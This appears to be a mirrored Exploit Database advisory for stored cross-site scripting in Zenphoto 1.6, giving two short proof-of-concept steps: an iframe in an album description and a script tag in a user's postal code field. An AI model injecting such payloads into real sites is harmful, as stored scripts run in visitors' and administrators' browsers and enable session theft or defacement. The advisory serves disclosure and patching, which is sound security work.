Zenphoto 1.6 – Multiple stored XSS

• Exploit Database
• 13 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-05-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51485/

• Exploit Title: Zenphoto 1.6 - Multiple stored XSS
  Application: Zenphoto-1.6 xss poc
  Version: 1.6 
  Bugs:XSS
  Technology: PHP
  Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
  Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
  Date of found: 01-05-2023
  Author: Mirabbas Ağalarov
  Tested on: Linux 
  
  
  2. Technical Details & POC
  ========================================
  ###XSS-1###
  steps: 
  1. create new album 
  2. write Album Description : <iframe src="https://14.rs"></iframe> 
  3. save and view albumhttp://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/
  
  =====================================================
  ###XSS-2###
  steps: 
  1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
  2.change postal codeas <script>alert(4)</script>
  3.if admin user information import as html , xss will trigger
  
  poc video : https://youtu.be/JKdC980ZbLY